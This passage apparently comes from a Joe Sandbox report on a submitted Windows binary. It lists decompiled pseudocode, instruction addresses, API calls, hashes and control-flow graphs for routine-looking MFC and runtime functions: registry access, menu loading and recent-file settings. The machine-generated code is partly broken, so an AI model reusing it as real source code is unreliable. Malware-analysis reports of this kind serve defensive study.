					L17:
					return E00AAD30A(_t88);
				}
				L32:
			}




















































      0x009b368f
      0x009b3696
      0x009b369b
      0x009b369e
      0x009b36a1
      0x009b36a3
      0x009b36a5
      0x009b36a7
      0x009b36ab
      0x009b3738
      0x009b373d
      0x009b3740
      0x009b3743
      0x009b3744
      0x009b374a
      0x009b374d
      0x009b3750
      0x009b3757
      0x009b3759
      0x009b3768
      0x009b376e
      0x009b3770
      0x009b3776
      0x009b3778
      0x009b377a
      0x009b377d
      0x009b37ba
      0x009b37c0
      0x009b37c7
      0x009b37c7
      0x00000000
      0x009b377f
      0x009b377f
      0x009b377f
      0x009b377f
      0x009b3782
      0x009b3784
      0x00000000
      0x00000000
      0x009b3786
      0x009b3789
      0x009b378c
      0x009b378e
      0x00000000
      0x009b3790
      0x009b3790
      0x009b3792
      0x00000000
      0x009b3794
      0x009b3794
      0x009b3796
      0x00000000
      0x009b3798
      0x009b37a5
      0x009b37a8
      0x009b37aa
      0x009b37ad
      0x009b37af
      0x009b37b2
      0x009b37b5
      0x009b37b8
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b37b8
      0x009b3796
      0x009b3792
      0x00000000
      0x009b378e
      0x009b37d5
      0x009b37da
      0x009b37de
      0x009b37e0
      0x009b37e2
      0x009b37ed
      0x009b37f3
      0x009b37f8
      0x009b37fd
      0x009b37ff
      0x009b3802
      0x009b3803
      0x009b3804
      0x009b3805
      0x009b3809
      0x009b380f
      0x009b3812
      0x009b3815
      0x009b3818
      0x009b381d
      0x009b3823
      0x009b3829
      0x009b382f
      0x009b3832
      0x009b3929
      0x009b392b
      0x009b392d
      0x009b392d
      0x009b394e
      0x009b395a
      0x00000000
      0x009b3838
      0x009b383a
      0x009b383f
      0x009b3845
      0x009b3847
      0x009b3860
      0x009b387c
      0x009b3882
      0x009b3885
      0x009b388b
      0x009b3891
      0x009b3893
      0x009b3899
      0x009b389b
      0x009b38d4
      0x009b38da
      0x009b38da
      0x009b38e5
      0x009b38eb
      0x009b38f1
      0x009b3911
      0x009b3919
      0x009b3924
      0x009b38f3
      0x009b38f9
      0x009b3902
      0x009b3902
      0x009b3906
      0x009b3908
      0x009b3908
      0x009b390a
      0x009b3849
      0x009b3849
      0x009b395b
      0x009b395d
      0x009b395d
      0x009b3847
      0x009b3967
      0x009b396f
      0x009b3970
      0x009b3971
      0x009b3975
      0x009b397d
      0x009b397d
      0x009b375b
      0x009b375e
      0x00000000
      0x009b375e
      0x009b36b1
      0x009b36b1
      0x009b36b4
      0x009b36b9
      0x009b36be
      0x009b36c7
      0x009b36ca
      0x009b36cd
      0x009b36e3
      0x009b36e7
      0x009b36ea
      0x009b36ed
      0x009b36ef
      0x009b36f5
      0x009b36f7
      0x009b36f9
      0x009b372c
      0x009b372c
      0x009b372e
      0x009b3734
      0x009b36fb
      0x009b36fc
      0x009b3707
      0x009b3714
      0x009b3716
      0x009b3718
      0x00000000
      0x009b371a
      0x009b371c
      0x009b371c
      0x009b371c
      0x009b3718
      0x009b3720
      0x009b3725
      0x009b36c0
      0x009b36c0
      0x009b36c0
      0x009b36c0
      0x009b37c8
      0x009b37cd
      0x009b37cd
      0x00000000

      APIs
      • __EH_prolog3.LIBCMT ref: 009B3696
      • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,00000000,?,00000010), ref: 009B36ED
      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009B3714
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
      • RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,00000000,3A0E8B0C,?,00000000,?,00000000,00AC830D,000000FF,?,80070057), ref: 009B3891
      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,80070057), ref: 009B38CA
      • RegCloseKey.ADVAPI32(?,?,80070057), ref: 009B38E5
      • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 009B394E
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: QueryValue$CloseH_prolog3PrivateProfileString_malloc
      • String ID:
      • API String ID: 900355960-0
      • Opcode ID: 8034db9eb7aa5b18f55ab00991f9fd47a5ae1690379b78ebc18267a12ae0e8f9
      • Instruction ID: fd54424fa081e334798358b402292362779a4ca1cb3f4145066efbc0c51b112c
      • Opcode Fuzzy Hash: 8034db9eb7aa5b18f55ab00991f9fd47a5ae1690379b78ebc18267a12ae0e8f9
      • Instruction Fuzzy Hash: 7691C4B1900168EFCB21DF64CD84ADEBBB8FF49720F108599F55997291DB749A80CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B333D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78registryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 481 9b333d-9b336f 482 9b3378 RegOpenKeyExA 481->482 483 9b3371-9b3376 call 9b3262 481->483 485 9b337e-9b3380 482->485 483->485 486 9b3382-9b339a 485->486 487 9b33d4-9b33dd 485->487 489 9b339c-9b33a1 call 9b32bb 486->489 490 9b33a3 RegCreateKeyExA 486->490 491 9b33df-9b33e2 RegCloseKey 487->491 492 9b33e4-9b33e7 487->492 494 9b33a9-9b33ab 489->494 490->494 491->492 495 9b33e9-9b33ec RegCloseKey 492->495 496 9b33ee-9b33f5 492->496 494->487 498 9b33ad-9b33c5 494->498 495->496 499 9b33ce RegCreateKeyExA 498->499 500 9b33c7-9b33cc call 9b32bb 498->500 499->487 500->487
      APIs
      • RegOpenKeyExA.KERNELBASE(80000001,software,00000000,0002001F,?), ref: 009B3378
      • RegCreateKeyExA.KERNELBASE(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 009B33A3
      • RegCreateKeyExA.KERNELBASE(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 009B33CE
      • RegCloseKey.KERNELBASE(?), ref: 009B33E2
      • RegCloseKey.ADVAPI32(?), ref: 009B33EC
        • Part of subcall function 009B3262: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 009B3274
        • Part of subcall function 009B3262: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 009B3284
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseCreate$AddressHandleModuleOpenProc
      • String ID: software
      • API String ID: 550756860-2010147023
      • Opcode ID: 6a06592c754586ba682067207f5cd8c03b65d3681f0cd5c79f3f792c1145df9a
      • Instruction ID: bbeeff53ae8e59714c27a726a8e8e1bb127cd95074a669932fcddf9289a8f735
      • Opcode Fuzzy Hash: 6a06592c754586ba682067207f5cd8c03b65d3681f0cd5c79f3f792c1145df9a
      • Instruction Fuzzy Hash: D2211831900158FB8B21DB9ACE84CEFBFBEEFC5720B64805AF506A2010DB325B41DB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AACA9C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 503 aaca9c-aacabd call aad340 call ab5091 508 aacb9b-aacbab call aacbc7 503->508 509 aacac3-aacad4 503->509 518 aacbad-aacbc2 call ab4fb8 call aac984 508->518 519 aacbd6-aacbdb call aad385 508->519 511 aacb7a 509->511 512 aacada-aacaef RtlDecodePointer 509->512 513 aacb81-aacb88 511->513 515 aacb59 512->515 516 aacaf1-aacb01 DecodePointer 512->516 513->508 517 aacb8a-aacb91 513->517 520 aacb60-aacb67 515->520 521 aacb04-aacb0c 516->521 523 aacb93 517->523 524 aacb95-aacb99 517->524 536 aacbc7-aacbcb 518->536 520->511 527 aacb69-aacb70 520->527 521->515 522 aacb0e-aacb15 call ab4097 521->522 522->521 535 aacb17-aacb19 522->535 523->524 524->513 531 aacb72 527->531 532 aacb74-aacb78 527->532 531->532 532->520 535->515 539 aacb1b-aacb3f DecodePointer call ab4097 DecodePointer * 2 535->539 537 aacbcd-aacbd4 call ab4fb8 536->537 538 aacbd5 536->538 537->538 545 aacb41-aacb44 539->545 546 aacb46-aacb51 539->546 545->546 547 aacb54-aacb57 545->547 546->547 547->521
      C-Code - Quality: 24%
      			E00AACA9C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				intOrPtr* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr* _t53;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				_push(0x20);
				_push(0xb19418);
				E00AAD340(__ebx, __edi, __esi);
				E00AB5091(__ebx, __edi, 8);
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				_t58 =  *0xd136d8 - 1; // 0x1
				if(_t58 != 0) {
					 *0xd136d4 = 1;
					_t34 =  *((intOrPtr*)(_t56 + 0x10));
					 *0xd136d0 =  *((intOrPtr*)(_t56 + 0x10));
					if( *((intOrPtr*)(_t56 + 0xc)) == 0) {
						_t55 = __imp__DecodePointer; // executed
						_t34 =  *_t55( *0xd146f4); // executed
						_t45 = 1;
						 *((intOrPtr*)(_t56 - 0x30)) = 1;
						if(1 != 0) {
							_t34 =  *_t55( *0xd146f0);
							_t53 = 1;
							 *((intOrPtr*)(_t56 - 0x2c)) = 1;
							 *((intOrPtr*)(_t56 - 0x24)) = 1;
							 *((intOrPtr*)(_t56 - 0x28)) = 1;
							while(1) {
								_t53 = _t53 - 4;
								 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
								if(_t53 < _t45) {
									goto L11;
								}
								if( *_t53 == _t34) {
									continue;
								} else {
									if(_t53 >= _t45) {
										_t40 =  *_t55( *_t53);
										 *_t53 = E00AB4097(_t40);
										 *_t40();
										_t47 =  *_t55( *0xd146f4);
										_t34 =  *_t55( *0xd146f0);
										if( *((intOrPtr*)(_t56 - 0x24)) != _t47 ||  *((intOrPtr*)(_t56 - 0x28)) != _t34) {
											 *((intOrPtr*)(_t56 - 0x24)) = _t47;
											 *((intOrPtr*)(_t56 - 0x30)) = _t47;
											 *((intOrPtr*)(_t56 - 0x28)) = _t34;
											_t53 = _t34;
											 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
										}
										_t45 =  *((intOrPtr*)(_t56 - 0x30));
										continue;
									}
								}
								goto L11;
							}
						}
						L11:
						 *((intOrPtr*)(_t56 - 0x1c)) = 0xad6da4;
						while( *((intOrPtr*)(_t56 - 0x1c)) < 0xad6db0) {
							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x1c))));
							if(_t34 != 0) {
								_t34 =  *_t34();
							}
							 *((intOrPtr*)(_t56 - 0x1c)) =  *((intOrPtr*)(_t56 - 0x1c)) + 4;
						}
					}
					 *((intOrPtr*)(_t56 - 0x20)) = 0xad6db4;
					while( *((intOrPtr*)(_t56 - 0x20)) < 0xad6db8) {
						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x20))));
						if(_t34 != 0) {
							_t34 =  *_t34();
						}
						 *((intOrPtr*)(_t56 - 0x20)) =  *((intOrPtr*)(_t56 - 0x20)) + 4;
					}
				}
				 *(_t56 - 4) = 0xfffffffe;
				L23();
				if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
					return E00AAD385(_t34);
				} else {
					 *0xd136d8 = 1;
					_t36 = E00AB4FB8(8);
					E00AAC984( *((intOrPtr*)(_t56 + 8))); // executed
					if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
						return E00AB4FB8(8);
					}
					return _t36;
				}
			}











      0x00aaca9c
      0x00aaca9e
      0x00aacaa3
      0x00aacaaa
      0x00aacab0
      0x00aacab7
      0x00aacabd
      0x00aacac3
      0x00aacac8
      0x00aacacb
      0x00aacad4
      0x00aacae0
      0x00aacae6
      0x00aacae8
      0x00aacaea
      0x00aacaef
      0x00aacaf7
      0x00aacaf9
      0x00aacafb
      0x00aacafe
      0x00aacb01
      0x00aacb04
      0x00aacb04
      0x00aacb07
      0x00aacb0c
      0x00000000
      0x00000000
      0x00aacb15
      0x00000000
      0x00aacb17
      0x00aacb19
      0x00aacb1d
      0x00aacb26
      0x00aacb28
      0x00aacb32
      0x00aacb3a
      0x00aacb3f
      0x00aacb46
      0x00aacb49
      0x00aacb4c
      0x00aacb4f
      0x00aacb51
      0x00aacb51
      0x00aacb54
      0x00000000
      0x00aacb54
      0x00aacb19
      0x00000000
      0x00aacb15
      0x00aacb04
      0x00aacb59
      0x00aacb59
      0x00aacb60
      0x00aacb6c
      0x00aacb70
      0x00aacb72
      0x00aacb72
      0x00aacb74
      0x00aacb74
      0x00aacb60
      0x00aacb7a
      0x00aacb81
      0x00aacb8d
      0x00aacb91
      0x00aacb93
      0x00aacb93
      0x00aacb95
      0x00aacb95
      0x00aacb81
      0x00aacb9b
      0x00aacba2
      0x00aacbab
      0x00aacbdb
      0x00aacbad
      0x00aacbad
      0x00aacbb9
      0x00aacbc2
      0x00aacbcb
      0x00000000
      0x00aacbd4
      0x00aacbd5
      0x00aacbd5

      APIs
      • __lock.LIBCMT ref: 00AACAAA
        • Part of subcall function 00AB5091: __mtinitlocknum.LIBCMT ref: 00AB50A7
        • Part of subcall function 00AB5091: __amsg_exit.LIBCMT ref: 00AB50B3
        • Part of subcall function 00AB5091: EnterCriticalSection.KERNEL32(00000000,00000000,?,00AB41A1,0000000D), ref: 00AB50BB
      • RtlDecodePointer.NTDLL(00B19418,00000020,00AACC03,00000000,00000001,00000000,?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACAE6
      • DecodePointer.KERNEL32(?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACAF7
        • Part of subcall function 00AB4097: RtlEncodePointer.NTDLL(00000000,00AC0492,00D13BB8,00000314,00000000,?,?,?,?,?,00AB674F,00D13BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00AB4099
      • DecodePointer.KERNEL32(-00000004,?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACB1D
      • DecodePointer.KERNEL32(?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACB30
      • DecodePointer.KERNEL32(?,00AACC43,000000FF,?,00AB50B8,00000011,00000000,?,00AB41A1,0000000D), ref: 00AACB3A
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
      • String ID:
      • API String ID: 2005412495-0
      • Opcode ID: a4c5bec624cffbe609057b78f7ab2a13729bcb17f24b73213788e3d590bd80ca
      • Instruction ID: 84582111113a6e81620642ef1a0e7f368b1e72e626d37bf39bb39633b3cf75d2
      • Opcode Fuzzy Hash: a4c5bec624cffbe609057b78f7ab2a13729bcb17f24b73213788e3d590bd80ca
      • Instruction Fuzzy Hash: BB311870900309EFEF509FA9D9866DCBBF4BF5A320F10402AE451A7291CB764945CF75
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C9BDB Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 548 9c9bdb-9c9bf2 549 9c9bfc-9c9c0c 548->549 550 9c9bf4-9c9bf7 call 9a9079 548->550 552 9c9c0e-9c9c12 549->552 553 9c9c37-9c9c3b 549->553 550->549 552->553 554 9c9c14-9c9c34 call 9bd77f LoadMenuW LoadAcceleratorsW 552->554 555 9c9c3d-9c9c41 553->555 556 9c9c66-9c9c6a 553->556 554->553 555->556 557 9c9c43-9c9c63 call 9bd77f LoadMenuW LoadAcceleratorsW 555->557 558 9c9c6c-9c9c70 556->558 559 9c9c95-9c9c99 556->559 557->556 558->559 562 9c9c72-9c9c92 call 9bd77f LoadMenuW LoadAcceleratorsW 558->562 562->559
      C-Code - Quality: 96%
      			E009C9BDB(void* __ecx) {
				struct HINSTANCE__* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HACCEL__* _t31;
				struct HINSTANCE__* _t33;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t41;
				void* _t56;

				_push(__ecx);
				_t56 = __ecx;
				_t48 = __ecx + 0x84;
				_t31 =  *(__ecx + 0x84);
				if( *((intOrPtr*)(_t31 - 0xc)) == 0) {
					_t31 = E009A9079(_t48,  *((intOrPtr*)(__ecx + 0x54))); // executed
				}
				_t53 = LoadMenuW;
				_t45 = LoadAcceleratorsW;
				if( *(_t56 + 0x5c) != 0) {
					_t60 =  *((intOrPtr*)(_t56 + 0x44));
					if( *((intOrPtr*)(_t56 + 0x44)) == 0) {
						_t41 =  *(E009BD77F(LoadAcceleratorsW, LoadMenuW, _t56, _t60) + 0xc);
						_v8 = _t41;
						 *((intOrPtr*)(_t56 + 0x44)) = LoadMenuW(_t41,  *(_t56 + 0x5c) & 0x0000ffff);
						_t31 = LoadAcceleratorsW(_v8,  *(_t56 + 0x5c) & 0x0000ffff);
						 *(_t56 + 0x48) = _t31;
					}
				}
				if( *(_t56 + 0x58) != 0) {
					_t62 =  *((intOrPtr*)(_t56 + 0x4c));
					if( *((intOrPtr*)(_t56 + 0x4c)) == 0) {
						_t37 =  *(E009BD77F(_t45, _t53, _t56, _t62) + 0xc);
						_v8 = _t37;
						 *((intOrPtr*)(_t56 + 0x4c)) = LoadMenuW(_t37,  *(_t56 + 0x58) & 0x0000ffff);
						_t31 = LoadAcceleratorsW(_v8,  *(_t56 + 0x58) & 0x0000ffff);
						 *(_t56 + 0x50) = _t31;
					}
				}
				if( *(_t56 + 0x60) != 0) {
					_t64 =  *((intOrPtr*)(_t56 + 0x3c));
					if( *((intOrPtr*)(_t56 + 0x3c)) == 0) {
						_t33 =  *(E009BD77F(_t45, _t53, _t56, _t64) + 0xc);
						_v8 = _t33;
						 *((intOrPtr*)(_t56 + 0x3c)) = LoadMenuW(_t33,  *(_t56 + 0x60) & 0x0000ffff);
						_t31 = LoadAcceleratorsW(_v8,  *(_t56 + 0x60) & 0x0000ffff);
						 *(_t56 + 0x40) = _t31;
					}
				}
				return _t31;
			}













      0x009c9be0
      0x009c9be3
      0x009c9be5
      0x009c9beb
      0x009c9bf2
      0x009c9bf7
      0x009c9bf7
      0x009c9c00
      0x009c9c06
      0x009c9c0c
      0x009c9c0e
      0x009c9c12
      0x009c9c1d
      0x009c9c22
      0x009c9c27
      0x009c9c32
      0x009c9c34
      0x009c9c34
      0x009c9c12
      0x009c9c3b
      0x009c9c3d
      0x009c9c41
      0x009c9c4c
      0x009c9c51
      0x009c9c56
      0x009c9c61
      0x009c9c63
      0x009c9c63
      0x009c9c41
      0x009c9c6a
      0x009c9c6c
      0x009c9c70
      0x009c9c7b
      0x009c9c80
      0x009c9c85
      0x009c9c90
      0x009c9c92
      0x009c9c92
      0x009c9c70
      0x009c9c99

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Load$AcceleratorsMenu
      • String ID:
      • API String ID: 144087665-0
      • Opcode ID: d79af0f82b0c3d72095cb21f49074eabfb9a8e84dee19a0dae017af41a02e27c
      • Instruction ID: 98d2c70c1e7adad742af7ef33dd7b8c2450cddf95ddcaf52d56f5902af64e2c1
      • Opcode Fuzzy Hash: d79af0f82b0c3d72095cb21f49074eabfb9a8e84dee19a0dae017af41a02e27c
      • Instruction Fuzzy Hash: B121EDB5801714EFD730DBAAC949BAAF7F8FF48315F10481EE58682560E7B5A940DF11
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1645 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44COMMON
      Download Yara Rule
      C-Code - Quality: 71%
      			E009B1645(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr _t28;
				intOrPtr* _t35;
				void* _t36;

				_push(4);
				E00AAD232(0xac8206, __ebx, __edi, __esi);
				_t35 = __ecx;
				 *((intOrPtr*)(_t36 - 0x10)) = 0;
				E009B15E1(__ecx, 0x20, _t36 - 0x10);
				if( *((intOrPtr*)(_t36 + 8)) != 0) {
					_t39 =  *((intOrPtr*)(_t36 - 0x10));
					if( *((intOrPtr*)(_t36 - 0x10)) == 0) {
						_t28 = E009A6291(_t39, 0x20);
						 *((intOrPtr*)(_t36 - 0x10)) = _t28;
						 *(_t36 - 4) = 0;
						_t40 = _t28;
						if(_t28 == 0) {
							_t22 = 0;
							__eflags = 0;
						} else {
							_push(0x1e);
							_push( *((intOrPtr*)(_t36 + 8)));
							_push("File%d");
							_push("Recent File List");
							_push(0);
							_t22 = E009C3F8C(__ebx, _t28, __edx, 0, _t35, _t40);
						}
						 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t35 + 0x8c)) = _t22;
						 *((intOrPtr*)( *_t22 + 0x14))();
					}
				}
				 *((intOrPtr*)(_t35 + 0x9c)) =  *((intOrPtr*)( *_t35 + 0x7c))("Settings", "PreviewPages", 0);
				return E00AAD30A(_t19);
			}







      0x009b1645
      0x009b164c
      0x009b1651
      0x009b165b
      0x009b165e
      0x009b1666
      0x009b1668
      0x009b166b
      0x009b1675
      0x009b1677
      0x009b167a
      0x009b167d
      0x009b167f
      0x009b1698
      0x009b1698
      0x009b1681
      0x009b1681
      0x009b1683
      0x009b1686
      0x009b168b
      0x009b1690
      0x009b1691
      0x009b1691
      0x009b169a
      0x009b169e
      0x009b16a8
      0x009b16a8
      0x009b166b
      0x009b16bd
      0x009b16c8

      APIs
      • __EH_prolog3.LIBCMT ref: 009B164C
        • Part of subcall function 009A6291: _malloc.LIBCMT ref: 009A62AF
        • Part of subcall function 009C3F8C: __EH_prolog3.LIBCMT ref: 009C3F93
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3$_malloc
      • String ID: File%d$PreviewPages$Recent File List$Settings
      • API String ID: 1683881009-526586445
      • Opcode ID: 0db9a58a1685fa540b639f7e2f8fbe33d313ae6a531560aa24972615c660d26e
      • Instruction ID: a1a5a2c346ed5d443026b2d96310bd514d1a0d1ff8a49ef01d27aeb594908e38
      • Opcode Fuzzy Hash: 0db9a58a1685fa540b639f7e2f8fbe33d313ae6a531560aa24972615c660d26e
      • Instruction Fuzzy Hash: E7019270A40304EBCB14EFB08915FAE77B5BF85710F10491EF566A7281CB708500DF51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A2150 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E009A2150() {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				void* __ecx;
				signed int _t15;
				void* _t23;
				intOrPtr _t28;
				intOrPtr _t36;
				signed int _t38;
				void* _t39;
				void* _t40;

				_push(0xffffffff);
				_push(0xac77d4);
				_push( *[fs:0x0]);
				_push(_t28);
				_t15 =  *0xd0c910; // 0x3a0e8b0c
				_push(_t15 ^ _t38);
				 *[fs:0x0] =  &_v16;
				_t36 = _t28;
				_v20 = _t36;
				_v8 = 4;
				E00AC5C96(_t36); // executed
				_t19 =  *((intOrPtr*)(_t36 + 0x1c));
				_t40 = _t39 + 4;
				if( *((intOrPtr*)(_t36 + 0x1c)) != 0) {
					E00AAB4AB(_t19);
					_t40 = _t40 + 4;
				}
				 *((intOrPtr*)(_t36 + 0x1c)) = 0;
				_t20 =  *((intOrPtr*)(_t36 + 0x14));
				if( *((intOrPtr*)(_t36 + 0x14)) != 0) {
					E00AAB4AB(_t20);
					_t40 = _t40 + 4;
				}
				 *((intOrPtr*)(_t36 + 0x14)) = 0;
				_t21 =  *((intOrPtr*)(_t36 + 0xc));
				if( *((intOrPtr*)(_t36 + 0xc)) != 0) {
					E00AAB4AB(_t21);
					_t40 = _t40 + 4;
				}
				 *((intOrPtr*)(_t36 + 0xc)) = 0;
				_t22 =  *((intOrPtr*)(_t36 + 4));
				if( *((intOrPtr*)(_t36 + 4)) != 0) {
